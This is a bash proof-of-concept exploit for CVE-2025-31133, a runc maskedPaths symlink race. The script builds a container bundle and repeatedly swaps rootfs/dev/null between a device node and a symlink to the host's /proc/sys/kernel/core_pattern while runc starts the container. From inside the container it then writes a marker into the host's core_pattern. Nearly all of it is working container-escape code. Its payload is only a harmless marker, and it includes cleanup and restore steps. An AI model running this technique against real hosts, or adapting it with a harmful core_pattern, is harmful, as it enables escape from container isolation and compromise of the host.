#!/bin/bash
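# CVE-2025-31133 runc maskedPaths symlink race PoC.
# Demonstrates the vulnerability by attempting to set the host's
# /proc/sys/kernel/core_pattern to the marker string "pwned".
# The PoC executes no payload, but on success it leaves the host's
# core_pattern modified; restore it manually afterwards (the script prints the
# command). It also creates and deletes ./rootfs and ./config.json in the
# current directory.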

set -euo pipefail

# Resolve runc up front. A bare `VAR="$(which runc)"` under `set -e` aborts the
# script without any explanation when runc is missing, so check explicitly.
if ! RUNC_BIN="$(command -v runc)"; then
  echo "[!] ERROR: runc not found in PATH." >&2
  exit 1
fi
# Bundle root filesystem, created in (and removed from) the current directory.
CONTAINER_ROOTFS="./rootfs"
# Container id passed to every runc subcommand.
CONTAINER_NAME="cve31133poc"
# File that receives a copy of the host's core_pattern before the test.
ORIGINAL_CORE_PATTERN="/tmp/cve31133_original_core_pattern.txt"
# Marker string the PoC tries to write into core_pattern.
EXPLOIT_CORE_PATTERN="pwned"
# PID of the background race process; empty until it has been started.
RACE_PID=""

#######################################
# Best-effort teardown of everything the PoC creates: the background race
# process, the runc container, and the generated rootfs/config.json.
# Installed as the EXIT handler below, so it runs on every exit path.
# Globals:   RACE_PID, RUNC_BIN, CONTAINER_NAME, CONTAINER_ROOTFS (read)
# Arguments: none
# Outputs:   one progress line on stdout
# Returns:   0; every step tolerates failure
#######################################
cleanup() {
  echo "[*] Cleaning up..."
  # Stop the race process AND reap it before touching the rootfs; otherwise a
  # still-running iteration could re-create rootfs/dev/null while the
  # directory is being removed below.
  if [ -n "$RACE_PID" ] && kill -0 "$RACE_PID" 2>/dev/null; then
    kill "$RACE_PID" 2>/dev/null || true
    wait "$RACE_PID" 2>/dev/null || true
  fi
  # Force cleanup container (only if runc still knows about it)
  if "$RUNC_BIN" state "$CONTAINER_NAME" >/dev/null 2>&1; then
    "$RUNC_BIN" kill "$CONTAINER_NAME" KILL 2>/dev/null || true
    sleep 0.2
    "$RUNC_BIN" kill "$CONTAINER_NAME" 2>/dev/null || true
    sleep 0.2
    "$RUNC_BIN" delete "$CONTAINER_NAME" 2>/dev/null || true
    # Try force delete if still exists
    if "$RUNC_BIN" state "$CONTAINER_NAME" >/dev/null 2>&1; then
      "$RUNC_BIN" delete --force "$CONTAINER_NAME" 2>/dev/null || true
    fi
  fi
  # Remove the generated bundle files (paths are relative to the current dir)
  rm -rf "$CONTAINER_ROOTFS" config.json 2>/dev/null || true
}

# Run cleanup once, from the EXIT handler. INT/TERM are converted into a
# normal exit so the script stops instead of resuming after the handler
# returns (which would also run cleanup a second time at exit).
trap cleanup EXIT
trap 'exit 130' INT
trap 'exit 143' TERM

# Banner: identify the PoC and print the first line of `runc --version` so the
# operator can see which runc build is under test.
printf '%s\n' \
  "[*] ========================================" \
  "[*] CVE-2025-31133 PoC - Container Escape" \
  "[*] ========================================"
printf '%s\n' "[*] runc version: $($RUNC_BIN --version | head -1)"
printf '%s\n' "[*] Make sure this is a known vulnerable runc version (CVE-2025-31133)."

# Remove leftovers from an earlier run: a container registered under the same
# name (in whatever state) and the generated bundle files.

# True when runc still has a container registered under $CONTAINER_NAME.
stale_container_registered() {
  $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1
}

printf '%s\n' "[*] Cleaning up any existing containers and files..."
if stale_container_registered; then
  printf '%s\n' "[*] Found existing container, forcing cleanup..."
  # SIGKILL first, then the default signal, then delete; pause after each step.
  $RUNC_BIN kill "$CONTAINER_NAME" KILL 2>/dev/null || true
  sleep 0.5
  $RUNC_BIN kill "$CONTAINER_NAME" 2>/dev/null || true
  sleep 0.5
  $RUNC_BIN delete "$CONTAINER_NAME" 2>/dev/null || true
  sleep 0.5
  # Escalate to a forced delete if the container is still registered.
  if stale_container_registered; then
    printf '%s\n' \
      "[!] WARNING: Container still exists after cleanup attempt." \
      "[!] Trying force delete..."
    $RUNC_BIN delete --force "$CONTAINER_NAME" 2>/dev/null || true
  fi
fi
# Bundle files from a previous run
rm -rf "$CONTAINER_ROOTFS" config.json 2>/dev/null || true

# Save original core_pattern for comparison
echo "[*] Saving original core_pattern..."
# Read the sysctl once; fall back to "core" if it cannot be read (best effort).
ORIGINAL_PATTERN="$(cat /proc/sys/kernel/core_pattern 2>/dev/null || echo "core")"

# If the host already holds the marker value (for example after an earlier
# successful run that was never restored), the final comparison would report
# success no matter what happens. Stop here, before the saved copy of the real
# original value is overwritten with the marker.
if [ "$ORIGINAL_PATTERN" = "$EXPLOIT_CORE_PATTERN" ]; then
  echo "[!] ERROR: core_pattern is already '$EXPLOIT_CORE_PATTERN'; the result would be a false positive." >&2
  echo "[!] Restore the real value first (a previous run may have saved it in $ORIGINAL_CORE_PATTERN)." >&2
  exit 1
fi

# Keep a copy on disk as well, so the value is still available after this run.
printf '%s\n' "$ORIGINAL_PATTERN" > "$ORIGINAL_CORE_PATTERN"
echo "[*] Original core_pattern: $ORIGINAL_PATTERN"

# Fresh rootfs with static /dev
echo "[*] Creating fresh rootfs..."
mkdir -p "$CONTAINER_ROOTFS"/{proc,dev,sys,bin,tmp}
# Resolve busybox once with the POSIX `command -v`. The `|| true` keeps
# `set -e` from aborting before the explicit error below can be printed.
busybox_bin="$(command -v busybox || true)"
if [ -n "$busybox_bin" ] && [ -f "$busybox_bin" ]; then
  # busybox is installed as the container's only binary, /bin/sh.
  cp "$busybox_bin" "$CONTAINER_ROOTFS/bin/sh"
  chmod +x "$CONTAINER_ROOTFS/bin/sh"
else
  echo "[!] ERROR: busybox not found. Please install busybox-static."
  exit 1
fi
# Static /dev/null inside the rootfs: character device, major 1 / minor 3.
rm -f "$CONTAINER_ROOTFS/dev/null" 2>/dev/null || true
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3

# Write the OCI bundle config into the current directory. The container runs
# `/bin/sh -c "sleep 30"` as uid/gid 0 in new pid/network/mount/ipc/uts
# namespaces, mounts proc and sysfs, and lists core_pattern among maskedPaths.
# The delimiter is quoted because the document contains nothing to expand.
cat > config.json <<'EOF'
{
  "ociVersion": "1.0.2",
  "process": {
    "terminal": false,
    "user": { "uid": 0, "gid": 0 },
    "args": ["/bin/sh", "-c", "sleep 30"],
    "env": ["PATH=/bin"],
    "cwd": "/"
  },
  "root": { "path": "rootfs", "readonly": false },
  "mounts": [
    { "destination": "/proc", "type": "proc", "source": "proc" },
    { "destination": "/sys", "type": "sysfs", "source": "sysfs" }
  ],
  "linux": {
    "namespaces": [
      { "type": "pid" },
      { "type": "network" },
      { "type": "mount" },
      { "type": "ipc" },
      { "type": "uts" }
    ],
    "maskedPaths": [
      "/proc/kcore",
      "/proc/latency_stats",
      "/proc/timer_list",
      "/proc/sched_debug",
      "/sys/firmware",
      "/proc/sys/kernel/core_pattern"
    ]
  }
}
EOF
printf '%s\n' "[*] config.json created (explicit maskedPaths, /dev NOT bind-mounted to allow race on rootfs/dev/null)."

# Start the symlink race BEFORE and DURING runc run
# This exploits the race condition where runc doesn't verify /dev/null is actually a device node
# before using it for bind-mounting maskedPaths
# Strategy: Keep /dev/null as device node most of the time, but briefly replace it with symlink
# to increase chance of hitting the race during maskedPaths application
#
#######################################
# Toggle <rootfs>/dev/null between a symlink and a character device for about
# 20 seconds. Works on the bundle directory from the host side; intended to be
# started as a background job.
# Globals:   CONTAINER_ROOTFS (read), SECONDS (bash built-in elapsed-time counter)
# Arguments: none
# Returns:   status of the last loop command; a failing rm/ln/mknod ends the
#            loop early when errexit is in effect
#######################################
symlink_race() {
  # Deadline expressed in the shell's own elapsed-seconds counter.
  local end=$((SECONDS+20))
  while [ $SECONDS -lt $end ]; do
    # Keep device node most of the time (allows runc init to succeed)
    # Only briefly replace with symlink to catch the maskedPaths application window
    rm -f "$CONTAINER_ROOTFS/dev/null"
    ln -s /proc/sys/kernel/core_pattern "$CONTAINER_ROOTFS/dev/null"
    # Very short window as symlink (to catch maskedPaths)
    # usleep takes microseconds; if it is unavailable, fall back to sleep with
    # a fractional argument (assumes the installed sleep accepts fractions).
    usleep 500 2>/dev/null || sleep 0.0005
    # Put the real device back: character device, major 1 / minor 3.
    rm -f "$CONTAINER_ROOTFS/dev/null"
    mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
    # Longer window as device node (allows normal operation)
    usleep 5000 2>/dev/null || sleep 0.005
  done
}

# Ensure /dev/null exists before starting
# (re-created as character device 1:3 so the race begins from a known state)
rm -f "$CONTAINER_ROOTFS/dev/null" 2>/dev/null || true
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3

echo "[*] Starting symlink race background process..."
# Run the loop as a background job and remember its PID; cleanup() uses
# RACE_PID to stop it and the script waits on it later.
symlink_race &
RACE_PID=$!

# Small delay to ensure race is running
sleep 0.1

# Last guard before launch: a container still registered under this name
# would make `runc run` fail, so abort with manual recovery instructions.
if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
  printf '%s\n' \
    "[!] ERROR: Container '$CONTAINER_NAME' still exists after cleanup!" \
    "[!] Please manually delete it: sudo runc delete $CONTAINER_NAME" \
    "[!] Or force delete: sudo runc delete --force $CONTAINER_NAME"
  exit 1
fi

# Launch the container (detached, bundle = current directory) while the race
# loop is active. Capture the exit status instead of branching on the command.
printf '%s\n' "[*] Launching runc run..."
launch_status=0
$RUNC_BIN run --detach --bundle . "$CONTAINER_NAME" 2>&1 || launch_status=$?

if [ "$launch_status" -ne 0 ]; then
  printf '%s\n' "[!] ERROR: Failed to start container."
  # A registered-but-broken container (e.g. the "already exists" case) is
  # torn down so that the next attempt starts clean.
  if $RUNC_BIN state "$CONTAINER_NAME" >/dev/null 2>&1; then
    printf '%s\n' "[!] Container exists but may be in a bad state. Attempting cleanup..."
    $RUNC_BIN kill "$CONTAINER_NAME" KILL 2>/dev/null || true
    sleep 1
    $RUNC_BIN delete --force "$CONTAINER_NAME" 2>/dev/null || true
    printf '%s\n' "[!] Please run the script again after cleanup."
  fi
  exit 1
fi

# Wait for container to be ready
sleep 2

# Check if container is running.
# `runc state` exits 0 for any container it knows about, including ones that
# are only created or already stopped, so its exit status alone cannot show
# that the container is running. Inspect the "status" field of the JSON it
# prints instead. The `|| true` keeps `set -e` from aborting before the
# explicit error message below.
container_state="$("$RUNC_BIN" state "$CONTAINER_NAME" 2>/dev/null || true)"
running_re='"status"[[:space:]]*:[[:space:]]*"running"'
if [[ ! "$container_state" =~ $running_re ]]; then
  echo "[!] ERROR: Container is not running."
  exit 1
fi

# Announce the test step, then try to write the marker string to
# /proc/sys/kernel/core_pattern from inside the container.
echo "[*] Container is running."
echo "[*] Attempting to write to /proc/sys/kernel/core_pattern in container..."
echo "[*] This exploits the race condition if /dev/null was replaced with symlink during maskedPaths."
echo "[*] Writing 'pwned' to prove the vulnerability (safe PoC, no code execution)."

# Try to write to core_pattern (safe PoC - just writes "pwned")
# $EXPLOIT_CORE_PATTERN is expanded by this (host) shell before the command
# string is handed to the container's /bin/sh. The inner `&& ... || ...` chain
# ends in an echo, so the outer `if` effectively reports only whether
# `runc exec` itself ran; whether the write took effect is decided later by
# re-reading core_pattern on the host.
if $RUNC_BIN exec "$CONTAINER_NAME" /bin/sh -c "echo '$EXPLOIT_CORE_PATTERN' > /proc/sys/kernel/core_pattern 2>&1 && echo 'Write successful' || echo 'Write failed'" 2>&1; then
  echo "[*] Attempted to write 'pwned' to core_pattern."
else
  echo "[!] WARNING: Failed to write to core_pattern in container."
fi

# Let the background race loop run to completion (its status is irrelevant).
wait "$RACE_PID" 2>/dev/null || true

# Stop and remove the container; both steps are best effort, the EXIT handler
# retries more forcefully if anything is left behind.
printf '%s\n' "[*] Stopping container..."
for runc_action in kill delete; do
  $RUNC_BIN "$runc_action" "$CONTAINER_NAME" 2>/dev/null || true
done

# Verdict: compare the host's current core_pattern with the saved original and
# with the marker value.
# Exit status: 0 = marker present, 2 = changed to something else, 1 = unchanged.
printf '%s\n' \
  "" \
  "[*] ========================================" \
  "[*] Exploit Verification" \
  "[*] ========================================"
CURRENT_PATTERN=$(cat /proc/sys/kernel/core_pattern 2>/dev/null || echo "")
printf '%s\n' \
  "[*] Original core_pattern: $ORIGINAL_PATTERN" \
  "[*] Current core_pattern:  $CURRENT_PATTERN"

# Case 1: the marker value is now in place.
if [ "$CURRENT_PATTERN" = "$EXPLOIT_CORE_PATTERN" ]; then
  printf '%s\n' \
    "" \
    "[+] ========================================" \
    "[+] EXPLOIT SUCCEEDED!" \
    "[+] ========================================" \
    "[+] core_pattern has been modified to: $CURRENT_PATTERN" \
    "[+] This means the race condition was successful and /dev/null was replaced" \
    "[+] with a symlink during maskedPaths application." \
    "[+] Container escape via CVE-2025-31133 is confirmed!" \
    "[+] The vulnerability allows writing to host's /proc/sys/kernel/core_pattern" \
    "[+] from inside a container, proving the container escape capability." \
    "" \
    "[!] NOTE: The host's core_pattern has been modified to 'pwned'." \
    "[!] This is safe and does not execute code. You can restore it:" \
    "[!]   echo '$ORIGINAL_PATTERN' | sudo tee /proc/sys/kernel/core_pattern"
  exit 0
fi

# Case 2: the value changed, but not to the marker.
if [ "$CURRENT_PATTERN" != "$ORIGINAL_PATTERN" ]; then
  printf '%s\n' \
    "" \
    "[?] core_pattern was modified but not to expected value." \
    "[?] This might indicate a partial success or different exploit path."
  exit 2
fi

# Case 3: nothing changed.
printf '%s\n' \
  "" \
  "[-] Exploit did not succeed - core_pattern unchanged." \
  "[-] The race condition may not have been hit, or the vulnerable version" \
  "[-] check failed. Try running multiple times (race conditions are non-deterministic)."
exit 1
